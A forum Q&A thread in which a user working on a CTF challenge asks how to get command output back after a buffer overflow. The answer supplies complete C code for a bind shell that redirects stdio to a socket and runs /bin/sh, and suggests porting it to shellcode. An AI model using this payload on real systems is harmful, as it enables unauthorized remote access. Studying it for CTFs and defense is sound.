# How can I use bufferoverflow to both execute a program remotely and write the output to a socket?

Tags: assembly, system-calls, buffer-overflow, netcat, shellcode

I am working on a CTF challenge so this is not for any malicious purposes.  I have successfully used buffer overflow to gain access to a remote system.  However, my issue lies in the fact that I need to both execute a command on this system and then send the output of that command back to me.

This would be easily done if it was not a remote system, but considering that it is, my main idea right now is to use Netcat to pipe the output of the command to me.  I don't know how to complete this task though, as I don't know if it would be possible to do such a thing in bytecode, especially with the limited buffer space I am working with.

Another possibility I could think of was exec'ing netcat and then exec'ing the command that prints to standard out - however, my understanding of exec is that it replaces the current program with a new one.  So if I exec'd after exec'ing netcat, that would close the socket and stop netcat, right?

Any other ideas would be appreciated

Comment: Did you ever make any headway with this?

Answer (score 2):

Rather than write your shell code for you, I'll provide *C* code you would use listen on a port for a connection and then once accepted you redirect STDIN, STDOUT, STDERR to the connection's file descriptor. Then you can launch `/bin/sh` . This should allow you to interact with the remote end:

```
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>

int main()
{
    struct sockaddr_in saddr;
    int connectionfd = 0;
    int socketfd = 0;

    char *argv[] = { "/bin/sh", 0 };

    bzero(&saddr, sizeof(saddr));
    socketfd = socket(AF_INET, SOCK_STREAM, 0);
    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = htonl(INADDR_ANY);
    saddr.sin_port = htons(1234);

    bind(socketfd, (struct sockaddr *)&saddr, sizeof(saddr));
    listen(socketfd, 8);
    connectionfd = accept(socketfd, (struct sockaddr *) NULL, NULL);
    dup2(connectionfd, 0);
    dup2(connectionfd, 1);
    dup2(connectionfd, 2);
    execve (argv[0], &argv[0], NULL);
}
```

I suspect from your question you have already done most of this and you only really need to do is `dup2` STDIN, STDOUT, STDERR and do `execve` (or similar).

To test this out, run the server code and then from the same system:

```
nc localhost 1234
```

Once the shell is running you can send commands like:

```
/bin/ls
```

To display all the files in the current directory. Without the path environment variable set you have to supply the full path of the programs you wish to run. Of course you don't need to run `/bin/sh` you can run any program you have the privileges to run. `/bin/sh` was just a convenient choice for a test.

---

Note: I have left off all error checking by design since you likely won't be doing it from shell code. This is meant as a bare bones demonstration.